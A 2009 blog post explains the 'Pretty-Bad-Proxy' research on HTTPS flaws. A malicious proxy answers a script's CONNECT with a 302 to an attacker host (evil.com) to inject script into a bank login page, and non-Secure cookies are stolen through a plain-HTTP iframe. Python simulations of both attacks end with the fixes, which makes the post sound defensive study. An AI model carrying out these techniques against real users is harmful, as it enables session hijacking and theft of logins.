Saturday, May 30, 2009

Modifying content in HTTPS

I know I haven't updated in a while, but I'm here again to share my information with whoever wants it. This time, it's not something personal that I've discovered or an experience of my own.
Instead, I've recently read a paper published by Microsoft that really got me thinking about other possibilities that I'm going to be testing out and having fun with in the near future. The paper, written with malicious proxies in mind, points out browser flaws in handling certain HTTPS events and presents intriguing research on modifying HTTPS content.

Personally, there was this one very inspiring technique that is rather easy to perform and something I'd consider dangerous. It applies whenever an HTTPS page such as https://bank.com/login.php pulls in files from another host, for example a JavaScript file from the subdomain https://scripts.bank.com/script.js. The victim's browser requests https://bank.com/login.php, and that page in turn makes the browser request https://scripts.bank.com/script.js. The attacker, sitting on the network path as a malicious proxy, never delivers that script: instead of tunnelling the connection to scripts.bank.com, it answers with a 302 redirect to an HTTPS script of its own. An easier to follow example:

A.) Victim sends a request for https://bank.com/login.php
B.) https://bank.com/login.php calls a script from https://scripts.bank.com/script.js
C.) The attacker does not return the requested content. When the browser opens the connection for https://scripts.bank.com/script.js, the attacker answers with a 302 redirect whose Location points to https://evil.com/script.js. The redirect arrives before any TLS handshake with scripts.bank.com takes place, so that site's certificate is never checked, and evil.com can serve the replacement over a perfectly valid HTTPS connection of its own.
D.) Now the attacker's script is loaded in the context of https://bank.com/login.php, with no mixed-content warning since every URL involved is HTTPS. The attacker therefore has access to the client-side content of the site and can use DOM manipulation to modify it.
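The exchange in steps A to D, as an added example in Python (it is not code from this post or from the Microsoft paper). A browser that is configured to use a proxy opens an HTTPS connection by sending a plaintext CONNECT request to the proxy and starts the TLS handshake only after the proxy answers 200. The simulated malicious proxy below answers the CONNECT for scripts.bank.com with a 302 instead, and the two browser models show why following that 302 is the bug. The host names are the post's placeholders and the request bytes are constructed for the demo.

```python
"""Simulation of the proxy-side 302 trick from steps A to D.

Added example; not code from this post or from the Microsoft paper.
A browser using an HTTP proxy opens an HTTPS connection by sending a
plaintext "CONNECT host:443 HTTP/1.1" request and starts the TLS
handshake only after the proxy answers 200. The proxy modelled here
answers the CONNECT for the script host with a 302 instead. The host
names are the post's placeholders and the request bytes are constructed
for the demo.
"""
import re
from typing import Optional
from urllib.parse import urlsplit

TARGET_HOST = "scripts.bank.com"            # script host the proxy hijacks
REDIRECT_TO = "https://evil.com/script.js"  # attacker-controlled replacement

CONNECT_RE = re.compile(rb"^CONNECT ([^\s:]+):(\d+) HTTP/1\.[01]\r\n")


def browser_connect_request(url: str) -> bytes:
    """The plaintext request a proxy-configured browser sends before TLS."""
    parts = urlsplit(url)
    host, port = parts.hostname, parts.port or 443
    return f"CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n\r\n".encode()


def malicious_proxy_response(request: bytes) -> bytes:
    """Reply to a CONNECT the way a malicious proxy would.

    An honest proxy answers every CONNECT with 200 and then relays the TLS
    bytes untouched. This one answers the CONNECT for TARGET_HOST with a 302.
    The 302 is sent before any TLS handshake, so scripts.bank.com's
    certificate is never checked and no warning is raised.
    """
    m = CONNECT_RE.match(request)
    if not m:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    if m.group(1).decode() == TARGET_HOST:
        return (b"HTTP/1.1 302 Found\r\n"
                b"Location: " + REDIRECT_TO.encode() + b"\r\n"
                b"Content-Length: 0\r\n\r\n")
    return b"HTTP/1.1 200 Connection established\r\n\r\n"


def redirect_location(response: bytes) -> Optional[str]:
    """Return the Location header of a 3xx response, else None."""
    status_line, _, headers = response.partition(b"\r\n")
    fields = status_line.split(b" ", 2)
    if len(fields) < 2 or not fields[1].startswith(b"3"):
        return None
    for line in headers.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"location":
            return value.strip().decode()
    return None


def script_fetched_from(url: str, follow_connect_redirects: bool,
                        max_hops: int = 5) -> str:
    """Simulate fetching the page's <script src=url> through the proxy.

    follow_connect_redirects=True models the browser behaviour the paper
    exploits: a 3xx answer to CONNECT is followed like any other redirect.
    False models the safe behaviour: only a 2xx on CONNECT means success,
    anything else aborts the fetch. Returns the URL whose content ends up
    executing inside https://bank.com/login.php, or "" if nothing loads.
    """
    for _ in range(max_hops):
        resp = malicious_proxy_response(browser_connect_request(url))
        if resp.split(b" ", 2)[1].startswith(b"2"):
            return url                      # tunnel opened, TLS to url's host
        loc = redirect_location(resp)
        if not (follow_connect_redirects and loc):
            return ""
        url = loc                           # vulnerable browser: CONNECT again
    return ""


if __name__ == "__main__":
    target = "https://scripts.bank.com/script.js"
    print("vulnerable browser runs:", script_fetched_from(target, True))
    print("hardened browser runs:  ", repr(script_fetched_from(target, False)))
```

The only difference between the two browser models is one rule: a CONNECT has succeeded only when the proxy answers 2xx. Anything else, including a 3xx, must be treated as a failed connection rather than as a redirect, because nothing the proxy says before the TLS handshake is authenticated.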

The paper has other great new ideas that make it completely worth the read. It also covers older ones, such as stealing the cookies of an HTTPS site that do not have the Secure bit set: the attacker modifies a page to insert a hidden iframe pointing at that same site over a regular HTTP session, and the browser attaches the non-Secure cookies to that cleartext request, where anyone on the network can read them. It is truly an inspiring paper that points at deeper problems in how our browsers handle HTTPS sessions.
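The cookie leak described above, as an added Python example (not code from this post or from the paper). The cookie jar implements only the Secure rule of RFC 6265: a cookie marked Secure is attached to HTTPS requests only, while one without the flag goes out on the plain-HTTP request that the injected iframe triggers. Host names and cookie values are constructed for the demo; Domain, Path and Expires handling are left out.

```python
"""Why a cookie set over HTTPS without the Secure attribute leaks.

Added example; not code from this post or from the paper. It implements
only the Secure rule of RFC 6265 (cookies are host-only here; Domain,
Path and Expires handling are left out). The host names and cookie
values are constructed for the demo.
"""
from urllib.parse import urlsplit


def parse_set_cookie(header: str):
    """Return (name, value, secure) from a Set-Cookie header value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    secure = any(p.lower() == "secure" for p in parts[1:])
    return name.strip(), value.strip(), secure


class CookieJar:
    """Minimal browser cookie store: (host, name) -> (value, secure)."""

    def __init__(self):
        self.cookies = {}

    def store(self, response_url: str, set_cookie_header: str) -> None:
        host = urlsplit(response_url).hostname
        name, value, secure = parse_set_cookie(set_cookie_header)
        self.cookies[(host, name)] = (value, secure)

    def cookie_header(self, request_url: str) -> str:
        """The Cookie header the browser attaches to a request for request_url."""
        u = urlsplit(request_url)
        over_tls = u.scheme == "https"
        sent = []
        for (host, name), (value, secure) in self.cookies.items():
            if host != u.hostname:
                continue
            if secure and not over_tls:
                continue            # the Secure bit: never sent on plain HTTP
            sent.append(f"{name}={value}")
        return "; ".join(sent)


def attacker_sees(jar: CookieJar, injected_iframe_src: str) -> str:
    """What a network attacker reads from the request that an injected
    <iframe src=injected_iframe_src> triggers. TLS traffic is opaque to
    them, so only a plain-http iframe yields anything."""
    if urlsplit(injected_iframe_src).scheme != "http":
        return ""
    return jar.cookie_header(injected_iframe_src)


if __name__ == "__main__":
    jar = CookieJar()
    # constructed: what https://bank.com/login.php set after a login
    jar.store("https://bank.com/login.php", "session=abc123; Path=/")
    jar.store("https://bank.com/login.php", "auth=xyz789; Path=/; Secure")
    print("attacker sees:", attacker_sees(jar, "http://bank.com/"))
```

The fix is on the server side: every cookie an HTTPS site sets should carry the Secure attribute, so that the iframe trick yields an empty Cookie header.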

Paper ("Pretty-Bad-Proxy: An Overlooked Adversary in Browsers' HTTPS Deployments", IEEE Symposium on Security and Privacy 2009) located at: http://research.microsoft.com/pubs/79323/pbp-final-with-update.pdf

Presentation slides at: http://research.microsoft.com/pubs/79323/PBP-oakland-public.ppt
